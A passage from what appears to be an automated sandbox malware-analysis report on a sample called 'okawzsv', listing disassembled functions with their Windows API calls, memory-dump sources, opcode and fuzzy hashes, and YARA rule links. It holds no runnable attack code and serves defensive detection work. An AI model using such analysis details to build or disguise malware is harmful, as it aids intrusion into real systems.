                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: b2397366000154510d762502a318a62a9c21350ba9503ad02ffce0888c735c3a
                                                                                                                        • Instruction ID: 12493e81235b736e5c6a19267a7f486ac8b49ca60fae4007684d113f2f4ad5f7
                                                                                                                        • Opcode Fuzzy Hash: b2397366000154510d762502a318a62a9c21350ba9503ad02ffce0888c735c3a
                                                                                                                        • Instruction Fuzzy Hash: CE01C2B2D4025CBAEB10AAA19C82DEF7B7C9F41794F0480A9FE14A7241D5284E068BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413BC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 93 413bc3-413c00 call 42a263 call 42ac73 call 4173a3 100 413c07-413c2d call 423da3 93->100 101 413c02 call 4048a3 93->101 105 413c4d-413c53 100->105 106 413c2f-413c3e PostThreadMessageW 100->106 101->100 106->105 107 413c40-413c4a 106->107 107->105
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: f2cc3259a991fc70154711afcc6c10927f8854c4d7537284e83ea66758590cce
                                                                                                                        • Instruction ID: de9477430fcd604e25c47dac0fa00e36b387a0f04ef6605f5d406ef52660caf1
                                                                                                                        • Opcode Fuzzy Hash: f2cc3259a991fc70154711afcc6c10927f8854c4d7537284e83ea66758590cce
                                                                                                                        • Instruction Fuzzy Hash: F801C8B2D0125CBADB10AAD1DC81DEF7B7C9F41794F048069FD1477241E56C5F068BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00428663 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00419990,?,?,00419990,?,?,?,00419990,?,00002000), ref: 004286A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: 8d818a1cf74cbda191dcc26f4aac2b53faa3d4ad35a85bf4eb1abe4f436ec26b
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: 48E0EDB16452147BD614EE59EC41FDB77ACEFC9714F004419FD08A7241D670B9118AF4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004286B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00412285,?,00412285,?,00000000,00412285,?,00412285,?,?), ref: 004286EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction ID: 9085c877e11e7f18b543827f64cd36498cd9212a1cc9c1685cd7aeba0f25bff9
                                                                                                                        • Opcode Fuzzy Hash: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction Fuzzy Hash: B3E06DB12002187BD620EE59DC41FDB33ACDFC9710F000419FE48A7242D670B9118AF9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00428703 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,C9A01013,?,?,C9A01013), ref: 00428737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 706166bd19ae4e6e253ab784ccbeb40f0997734dc67e646cfff2cc6400dc12a5
                                                                                                                        • Instruction ID: 545911fe7cf8103afb44a29e5664223591d0b01ab1ea1272c36d31e111720f01
                                                                                                                        • Opcode Fuzzy Hash: 706166bd19ae4e6e253ab784ccbeb40f0997734dc67e646cfff2cc6400dc12a5
                                                                                                                        • Instruction Fuzzy Hash: 39E086753412147BD620EB6ADC01FDBB75CDFCA710F004419FA4867281C67079108BF5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2ed4f54b38d4cbcb6640bdab0a357b822e82cf1ae06a1809a203c0954e600bb4
                                                                                                                        • Instruction ID: 9557f3e86e570f4eb31783333b05b344e4bf141b22c75a260d17adc54ed34f76
                                                                                                                        • Opcode Fuzzy Hash: 2ed4f54b38d4cbcb6640bdab0a357b822e82cf1ae06a1809a203c0954e600bb4
                                                                                                                        • Instruction Fuzzy Hash: 51B09B719015C5C5DB11E7644A0871B790467D1751F16C076D2030745F473CC5D1E675
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00AA096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AA2DF0: LdrInitializeThunk.NTDLL ref: 00AA2DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA0BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA0BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA0D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA0D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        • Opcode ID: 41dbd45e64e50123402778b8f91f7c3711ca8a4b1cc33bea9ec8acf4dae5bd5e
                                                                                                                        • Instruction ID: 56cdd1fc63d5e8db27e550860d5ed5efef71b4679ed850687ab82d9dc14b8975
                                                                                                                        • Opcode Fuzzy Hash: 41dbd45e64e50123402778b8f91f7c3711ca8a4b1cc33bea9ec8acf4dae5bd5e
                                                                                                                        • Instruction Fuzzy Hash: C2426D71900715DFDB20CF68C941BAAB7F4BF05310F1445AAE99ADB281E770EA85CF60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA4340 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 06993964186b8c2b3831da50f72746f6d916af5d52e20dd95372948e03351e99
                                                                                                                        • Instruction ID: 8a14213a75b35125c76e35534898ab28d26222df14c2f1a6740202c8969d26f7
                                                                                                                        • Opcode Fuzzy Hash: 06993964186b8c2b3831da50f72746f6d916af5d52e20dd95372948e03351e99
                                                                                                                        • Instruction Fuzzy Hash: FB900231605800129240715C4C84586400D97E0341B56C026E0425554D8E188A569761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA4650 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c58175b5f5df4b4101ec238d3cfd443c7a3d36e6b915a832292dd5d750246573
                                                                                                                        • Instruction ID: 4609b4ed5eae2e3e034567ca1f8d6dea8790a776735fc1c004eddfcbcecc551c
                                                                                                                        • Opcode Fuzzy Hash: c58175b5f5df4b4101ec238d3cfd443c7a3d36e6b915a832292dd5d750246573
                                                                                                                        • Instruction Fuzzy Hash: CB900261601500424240715C4C04446600D97E1341396C12AA0555560D8A1C8955D669
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d96adc1da743fa0720ad9fea398b4f4f923d8f9ae7ced89b82b86befa29500
                                                                                                                        • Instruction ID: 3982334f76b31719764af43a3bed804f703567e6397ea3829dcfb91145833c8b
                                                                                                                        • Opcode Fuzzy Hash: a3d96adc1da743fa0720ad9fea398b4f4f923d8f9ae7ced89b82b86befa29500
                                                                                                                        • Instruction Fuzzy Hash: 899002A1201540924600B25C8804B4A450D87E0341B56C02BE1055560DC9298951D535
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: db71abb66069d07cdb6545fa0500299b8a5a488805a2ba3eeeee620fff020d8e
                                                                                                                        • Instruction ID: 771fc71cbfc9a01473cb5509ff6ac905347ba02757c3a0380db2c1f75b2c0ba1
                                                                                                                        • Opcode Fuzzy Hash: db71abb66069d07cdb6545fa0500299b8a5a488805a2ba3eeeee620fff020d8e
                                                                                                                        • Instruction Fuzzy Hash: F9900225221400020245B55C0A0454B044D97D6391396C02AF1417590DCA2589659721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6fd13db1802201dc0c2b925fce9f559695358d1a2f5ad6852a46f03892c2478d
                                                                                                                        • Instruction ID: 48e45529cc49b7bac8c7dac9d15431a31f893891919375ace0bc4924b27ec36e
                                                                                                                        • Opcode Fuzzy Hash: 6fd13db1802201dc0c2b925fce9f559695358d1a2f5ad6852a46f03892c2478d
                                                                                                                        • Instruction Fuzzy Hash: D2900225211400030205B55C0B04547004E87D5391356C036F1016550DDA2589619521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 32c9bc71928e88adadff547e25d9b41196b8f341c7770891fb8274a196c0f04a
                                                                                                                        • Instruction ID: 564f65d41261902a9e3da457fd31601b44d13e066b074d4c756546324b387a0c
                                                                                                                        • Opcode Fuzzy Hash: 32c9bc71928e88adadff547e25d9b41196b8f341c7770891fb8274a196c0f04a
                                                                                                                        • Instruction Fuzzy Hash: 3990023160540802D250715C4814786000D87D0341F56C026A0025654E8B598B55BAA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d94d34860cf4b9fe53e58f508d0e5ccc81b00e5adb139e412244eb2fd3b22d24
                                                                                                                        • Instruction ID: 3429871ea79f3e58eac3d5f32a45e939821e2685d8fc922a76413f8e544b24e4
                                                                                                                        • Opcode Fuzzy Hash: d94d34860cf4b9fe53e58f508d0e5ccc81b00e5adb139e412244eb2fd3b22d24
                                                                                                                        • Instruction Fuzzy Hash: 3E90023120140802D204715C4C046C6000D87D0341F56C026A6025655F9A698991B531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 067c287032507375fc32ef53d261a145b4995956e277df0b3bdcfc2a5afaac03
                                                                                                                        • Instruction ID: 943706ae0a9292735c43461c49b0ebc58aae66c2410df866b51e1392d0194d98
                                                                                                                        • Opcode Fuzzy Hash: 067c287032507375fc32ef53d261a145b4995956e277df0b3bdcfc2a5afaac03
                                                                                                                        • Instruction Fuzzy Hash: 3790023120544842D240715C4804A86001D87D0345F56C026A0065694E9A298E55FA61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84d92e5cbc50a4a54bfc9cfed7359f4716d415459b8af34bd6510b9f394021fc
                                                                                                                        • Instruction ID: 7f85ffd29e88161b724ba72976dcb20306c1d3345647fe750efccb034e09d05a
                                                                                                                        • Opcode Fuzzy Hash: 84d92e5cbc50a4a54bfc9cfed7359f4716d415459b8af34bd6510b9f394021fc
                                                                                                                        • Instruction Fuzzy Hash: F890023120140802D280715C480468A000D87D1341F96C02AA0026654ECE198B59BBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 37be9252722337dbe401130b6b181b6c10d17f8465bffc682bfe3464e8ddf80d
                                                                                                                        • Instruction ID: 1ddeae22c747d229c7e61c1e1e70fd757bd72e2907a9da61243c72e750815564
                                                                                                                        • Opcode Fuzzy Hash: 37be9252722337dbe401130b6b181b6c10d17f8465bffc682bfe3464e8ddf80d
                                                                                                                        • Instruction Fuzzy Hash: E490023120140402D200759C5808686000D87E0341F56D026A5025555FCA698991A531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1909a8e2e3a2632c95de3a8c3c651ce5904ff6ce26ea2f61dab7708205db01d4
                                                                                                                        • Instruction ID: 65a1a116c3d5aaec87df91826d47520432867726c8661d9583604085eb2562e9
                                                                                                                        • Opcode Fuzzy Hash: 1909a8e2e3a2632c95de3a8c3c651ce5904ff6ce26ea2f61dab7708205db01d4
                                                                                                                        • Instruction Fuzzy Hash: F890023120140403D200715C5908747000D87D0341F56D426A0425558EDA5A8951A521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c11e2fd347810ad3862e097481843b120232d1d3c9238272aabbf4e6164e445
                                                                                                                        • Instruction ID: 79bb1a244aae43cecf9beab1a7b4a7c1be61c3f72dc1d422064e966c32c2d86c
                                                                                                                        • Opcode Fuzzy Hash: 5c11e2fd347810ad3862e097481843b120232d1d3c9238272aabbf4e6164e445
                                                                                                                        • Instruction Fuzzy Hash: 2590022160540402D240715C5818746001D87D0341F56D026A0025554ECA5D8B55AAA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 22813e2b36e61eb77a138dc24e6b0de0977c778760128fbd81a85785a065f8d0
                                                                                                                        • Instruction ID: b86891d460d73d5f936972f37a6c6c2d58abaa8791f6378d66fecdce926eb431
                                                                                                                        • Opcode Fuzzy Hash: 22813e2b36e61eb77a138dc24e6b0de0977c778760128fbd81a85785a065f8d0
                                                                                                                        • Instruction Fuzzy Hash: 3890023120140842D200715C4804B86000D87E0341F56C02BA0125654E8A19C951B921
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1255fedb388abb89f2e3e5e60b1c730640447fdb185d8c2ff97e923ec6fd6ad0
                                                                                                                        • Instruction ID: 5aadf0b687668fb01198c2082a7978b8b1c60cf020bc9896c98c92380ab91d74
                                                                                                                        • Opcode Fuzzy Hash: 1255fedb388abb89f2e3e5e60b1c730640447fdb185d8c2ff97e923ec6fd6ad0
                                                                                                                        • Instruction Fuzzy Hash: 1C90023124140402D241715C4804646000D97D0381F96C027A0425554F8A598B56EE61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8a8ec2be52568d50be239194dbae66aedfce6f6ab88a7d712528a804a016639d
                                                                                                                        • Instruction ID: 33a0bae28ecfd4d6c94ff5ce1941ce268c3ca4f9ba769f1c6cdd480ba64988ef
                                                                                                                        • Opcode Fuzzy Hash: 8a8ec2be52568d50be239194dbae66aedfce6f6ab88a7d712528a804a016639d
                                                                                                                        • Instruction Fuzzy Hash: F9900221242441525645B15C4804547400E97E0381796C027A1415950D892A9956DA21
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1a3e73d5089594dc86e2626c1d8d371774d9211291a83320ed2f8db69bd10270
                                                                                                                        • Instruction ID: 9a76a75874d96801fe59363b54efef3384f03c0601f193c87750d099fe4d6aee
                                                                                                                        • Opcode Fuzzy Hash: 1a3e73d5089594dc86e2626c1d8d371774d9211291a83320ed2f8db69bd10270
                                                                                                                        • Instruction Fuzzy Hash: 2B90022130140003D240715C5818646400DD7E1341F56D026E0415554DDD1989569622
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 257cd14cd058f1e5a1dd7fbe974f1270f5cceb1bc1fc0963dec8c95700aeb97c
                                                                                                                        • Instruction ID: 1887854750d063250271e21bbee7c0e663c4a66b9c45518811d062658555e4c5
                                                                                                                        • Opcode Fuzzy Hash: 257cd14cd058f1e5a1dd7fbe974f1270f5cceb1bc1fc0963dec8c95700aeb97c
                                                                                                                        • Instruction Fuzzy Hash: 9090022120544442D200755C5808A46000D87D0345F56D026A1065595ECA398951E531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2326152758b082d7a9159bbc509e0a6fed17c509e1587ae2797c3f1785faa28
                                                                                                                        • Instruction ID: 045155473b76ce49bf6d734580bc2e263a3f08c0bdb22d3caaff68e5623db723
                                                                                                                        • Opcode Fuzzy Hash: e2326152758b082d7a9159bbc509e0a6fed17c509e1587ae2797c3f1785faa28
                                                                                                                        • Instruction Fuzzy Hash: 5790022921340002D280715C580864A000D87D1342F96D42AA0016558DCD1989699721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
